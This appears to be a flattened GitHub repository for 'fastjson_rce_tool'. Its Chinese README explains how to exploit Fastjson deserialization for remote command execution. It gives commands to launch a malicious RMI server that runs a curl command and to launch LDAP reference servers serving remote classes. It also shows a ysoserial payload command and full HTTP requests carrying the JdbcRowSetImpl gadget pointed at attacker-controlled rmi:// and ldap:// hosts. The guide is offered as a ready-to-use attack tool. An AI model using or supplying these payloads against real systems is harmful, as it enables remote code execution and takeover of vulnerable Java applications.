├── 2.png
├── README.md
├── fastjson_tool.jar
└── work.png


/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j1anFen/fastjson_rce_tool/e7347c8039b48235dd2467b7144deb0493dad729/2.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # fastjson_rce_tool
 2 | 
 3 | ```
 4 | 备注：这里的利用方式可以突破一些限制条件，来完成命令执行。
 5 | 
 6 | rmi:
 7 | 1. 启动RMI服务，后面写要执行的语句(有依赖，tomcat8稳定复现)
 8 | java -cp fastjson_tool.jar EvilRMIServer 8888 53 "curl wyzxxz.cn"
 9 | 
10 | 2. 发送请求包
11 | POST /test HTTP/1.1
12 | Host: 127.0.0.1
13 | Content-Type: application/json
14 | Accept-Encoding: gzip, deflate
15 | Connection: close
16 | Accept: */*
17 | User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) 
18 | 
19 | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://ip:8888/Object","autoCommit":true}
20 | 
21 | 3. 查看日志是否curl成功
22 | 
23 | 
24 | 
25 | ldap:
26 | 1. 用下面命令生成base64编码过的测试语句
27 | java -jar ysoserial6.jar URLDNS 'http://wyzxxz.cn'|base64 > base64_payload_file
28 | 
29 | 2. 启动LDAP服务
30 | java -cp fastjson_tool.jar LDAPRefServer2 8888  base64_payload_file
31 | 
32 | 3. 发送请求包
33 | POST /test HTTP/1.1
34 | Host: 127.0.0.1
35 | Content-Type: application/json
36 | Accept-Encoding: gzip, deflate
37 | Connection: close
38 | Accept: */*
39 | User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) 
40 | 
41 | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:8888/Object","autoCommit":true}
42 | 
43 | 4. 查看日志是否执行成功，如果没有，用ysoserial的其他Payload尝试生成。
44 | 
45 | else:
46 | 
47 | 有些环境可能利用不成功，可以尝试默认的测试方法,
48 | 例如：
49 | 生成测试的class文件，启动http服务器
50 | 启动ldap服务，从http服务获取class
51 | java -cp fastjson_tool.jar LDAPRefServer http://ip:port/#Object 8888
52 | 
53 | ```
54 | 
55 | 
56 | ![0](https://github.com/wyzxxz/fastjson_rce_tool/blob/master/work.png)
57 | 
58 | ![1](https://github.com/wyzxxz/fastjson_rce_tool/blob/master/2.png)
59 | 
60 | 


--------------------------------------------------------------------------------
/fastjson_tool.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j1anFen/fastjson_rce_tool/e7347c8039b48235dd2467b7144deb0493dad729/fastjson_tool.jar


--------------------------------------------------------------------------------
/work.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j1anFen/fastjson_rce_tool/e7347c8039b48235dd2467b7144deb0493dad729/work.png


--------------------------------------------------------------------------------